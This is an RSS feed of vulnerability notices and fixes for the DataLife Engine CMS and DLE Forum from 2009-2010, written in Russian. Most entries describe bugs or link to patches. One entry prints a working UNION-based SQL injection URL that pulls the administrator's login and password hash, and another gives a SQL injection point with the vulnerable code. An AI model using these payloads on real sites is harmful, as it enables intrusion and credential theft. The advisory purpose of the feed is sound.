<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title>Баги  - Всё для DLE, Datalife Engine, ДЛЕ. Шаблоны, Модули, Хаки, Скины</title>
<link>http://dle.in.ua/</link>
<language>ru</language>
<description>Баги  - Всё для DLE, Datalife Engine, ДЛЕ. Шаблоны, Модули, Хаки, Скины</description>
<generator>DataLife Engine</generator><item>
<title>Исправления в DLE Forum 2.5 для корректной работы со смайлами в DLE 9.0</title>
<guid isPermaLink="true">http://dle.in.ua/bags/9839-ispravleniya-v-dle-forum-25-dlya-korrektnoj.html</guid>
<link>http://dle.in.ua/bags/9839-ispravleniya-v-dle-forum-25-dlya-korrektnoj.html</link>
<description> Автор: Skater_1992 Совместимость: DLE Forum 2.x (тестилось на 2.5) Делаем чтобы смайлы показывались на DLE 9.0</description>
<category>Баги </category>
<dc:creator>Skater</dc:creator>
<pubDate>Sun, 22 Aug 2010 18:33:38 +0300</pubDate>
</item><item>
<title>Очередная инъекция в DLE Forum</title>
<guid isPermaLink="true">http://dle.in.ua/bags/9571-ocherednaya-inekciya-v-dle-forum.html</guid>
<link>http://dle.in.ua/bags/9571-ocherednaya-inekciya-v-dle-forum.html</link>
<description>Описание: sql-инъекция Зависимость: register_globals = on Файл: engine/forum/sources/showtopic.php Кусок кода:   if (intval($tid))  $row_topic = $db-&gt;super_query(&quot;SELECT * FROM &quot; . PREFIX . &quot;_forum_topics WHERE tid = $tid&quot;);    Как осуществить: http://site.com/?do=forum&amp;act=topic&amp;tid=1+[SQL]</description>
<category>Баги </category>
<dc:creator>stuk</dc:creator>
<pubDate>Wed, 23 Jun 2010 13:20:50 +0300</pubDate>
</item><item>
<title>SQL – инъекция в DLE-Forum 2.4</title>
<guid isPermaLink="true">http://dle.in.ua/bags/9497-sql-inekciya-v-dle-forum-24.html</guid>
<link>http://dle.in.ua/bags/9497-sql-inekciya-v-dle-forum-24.html</link>
<description>В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях. У кого стоит данная версия форума, рекомендуется проверить на уязвимость: ваш_сайт.ру/?do=forum&amp;amp;showtopic=-1+union+select+1,2,CONCAT_WS&amp;#40;0x3a,name,password&amp;#41;,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- , </description>
<category>Баги </category>
<dc:creator>stuk</dc:creator>
<pubDate>Fri, 11 Jun 2010 21:31:43 +0300</pubDate>
</item><item>
<title>Баг - получаем список доп. полей</title>
<guid isPermaLink="true">http://dle.in.ua/bags/9474-bag-poluchaem-spisok-dop-polej.html</guid>
<link>http://dle.in.ua/bags/9474-bag-poluchaem-spisok-dop-polej.html</link>
<description>Данный баг позволяет просто скачать список доп. полей новостей и юзеров  DLE уязвимость работает на версиях: ВСЕ DLE  Уровень риска: Низкая  Нашёл очередной баг: Lion__</description>
<category>Баги </category>
<dc:creator>Lion__</dc:creator>
<pubDate>Wed, 09 Jun 2010 03:28:36 +0300</pubDate>
</item><item>
<title>Баг - прямой вызов файлов и мусор в папках</title>
<guid isPermaLink="true">http://dle.in.ua/bags/9473-bag-pryamoj-vyzov-fajlov-i-musor-v-papkax.html</guid>
<link>http://dle.in.ua/bags/9473-bag-pryamoj-vyzov-fajlov-i-musor-v-papkax.html</link>
<description>Данный баг позволяет производить прямой запуск файлов и мусорить в папках  DLE уязвимость работает на версиях: ВСЕ DLE  Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)  Нашёл очередной баг: Lion__</description>
<category>Баги </category>
<dc:creator>Lion__</dc:creator>
<pubDate>Wed, 09 Jun 2010 02:42:51 +0300</pubDate>
</item><item>
<title>Недостаточная фильтрация входящих данных</title>
<guid isPermaLink="true">http://dle.in.ua/bags/9466-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html</guid>
<link>http://dle.in.ua/bags/9466-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html</link>
<description>Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта.  Ошибка в версии: Все версии  Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте)  Как исправить в полной новости...</description>
<category>Баги </category>
<dc:creator>DEN 007</dc:creator>
<pubDate>Tue, 08 Jun 2010 03:51:50 +0300</pubDate>
</item><item>
<title>Проведение атаки межсайтового скриптинга (XSS)</title>
<guid isPermaLink="true">http://dle.in.ua/bags/9440-provedenie-ataki-mezhsajtovogo-skriptinga-xss.html</guid>
<link>http://dle.in.ua/bags/9440-provedenie-ataki-mezhsajtovogo-skriptinga-xss.html</link>
<description>Проблема: При определенных условиях на сайт можно провести атаку XSS. Данными условиями является посещение авторизованным администратором, сайта злоумышленника, при этом использование администратором устаревшего браузера, что может привести к перехвату куков браузера.  Ошибка в версии: 7.x - 8.5  Степень опасности: Низкая  Для исправления скачайте и скопируйте на свой сервер патч: <span class="attachment"><a  href="http://dle.in.ua/download/2853/" >dle7_85_path.zip</a> [3.17 Kb] (cкачиваний: 256)</span>  Данный патч применим ко всем версиям: 7.x - 8.5</description>
<category>Баги </category>
<dc:creator>neoks</dc:creator>
<pubDate>Thu, 03 Jun 2010 19:29:55 +0300</pubDate>
</item><item>
<title>Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5</title>
<guid isPermaLink="true">http://dle.in.ua/bags/9179-ispravleniya-v-dle-forum-25-dlya-korrektnoj.html</guid>
<link>http://dle.in.ua/bags/9179-ispravleniya-v-dle-forum-25-dlya-korrektnoj.html</link>
<description>  Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5 (полная инструкция)</description>
<category>Баги </category>
<dc:creator>Macho</dc:creator>
<pubDate>Thu, 29 Apr 2010 14:20:31 +0300</pubDate>
</item><item>
<title>Запускаем DLE Forum 2.5 на DataLife Engine 8.5</title>
<guid isPermaLink="true">http://dle.in.ua/bags/8251-zapuskaem-dle-forum-25-na-datalife-engine-85.html</guid>
<link>http://dle.in.ua/bags/8251-zapuskaem-dle-forum-25-na-datalife-engine-85.html</link>
<description> При установке форума на DataLife Engine 8.5 перестаёт работать быстрый ответ и ещё некоторые AJAX-элементы. Это вызвано серьёзными изменениями в DataLife Engine и переносом AJAX-файлов в другую папку.  Ввиду этого, нам необходимо самим подправить AJAX-файлы DLE Forum'а, чтобы он работал корректно.  Мы предоставляем Вам 2 инструкции: как для установки в папку /forum, так и для поддомена.</description>
<category>Баги </category>
<dc:creator>Горбушка</dc:creator>
<pubDate>Fri, 05 Mar 2010 04:02:49 +0200</pubDate>
</item><item>
<title>фильтруем уязвимость в dle 8.2 и в раних версиях</title>
<guid isPermaLink="true">http://dle.in.ua/bags/7928-filtruem-uyazvimost-v-dle-82-i-v-ranix-versiyax.html</guid>
<link>http://dle.in.ua/bags/7928-filtruem-uyazvimost-v-dle-82-i-v-ranix-versiyax.html</link>
<description> Прочитал на ачате уязвимость с названием &quot;раскрытие путей&quot;, долго искал в поисках ответа,что за зверь раскрытие путей Степень опастности: средняя</description>
<category>Баги </category>
<dc:creator>nugumanov</dc:creator>
<pubDate>Fri, 12 Feb 2010 18:26:45 +0200</pubDate>
</item><item>
<title>DLE Forum - Недостаточная фильтрация входящих данных #2</title>
<guid isPermaLink="true">http://dle.in.ua/bags/7535-dle-forum-nedostatochnaya-filtraciya-vxodyashhix.html</guid>
<link>http://dle.in.ua/bags/7535-dle-forum-nedostatochnaya-filtraciya-vxodyashhix.html</link>
<description>Проблема: Отсутствие проверки доступа при редактирование сообщений. Ошибка в версии: 2.3 - 2.4 Степень опасности: Высокая  Инструкция внутри.</description>
<category>Баги </category>
<dc:creator>DmitriFB</dc:creator>
<pubDate>Sat, 23 Jan 2010 01:47:05 +0200</pubDate>
</item><item>
<title>Недостаточная фильтрация входящих данных</title>
<guid isPermaLink="true">http://dle.in.ua/bags/6702-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html</guid>
<link>http://dle.in.ua/bags/6702-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html</link>
<description>Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля.  Ошибка в версии: только 8.2, версии ниже 8.2, а также актуальная версия 8.3 данной уязвимости не подвержены  Степень опасности: Очень высокая  Для исправления скачайте и скопируйте на свой сервер патч: <span class="attachment"><a  href="http://dle.in.ua/download/2120/" >dle82_path.zip</a> [2.35 Kb] (cкачиваний: 1079)</span></description>
<category>Баги </category>
<dc:creator>DImkA</dc:creator>
<pubDate>Thu, 12 Nov 2009 18:15:44 +0200</pubDate>
</item></channel></rss>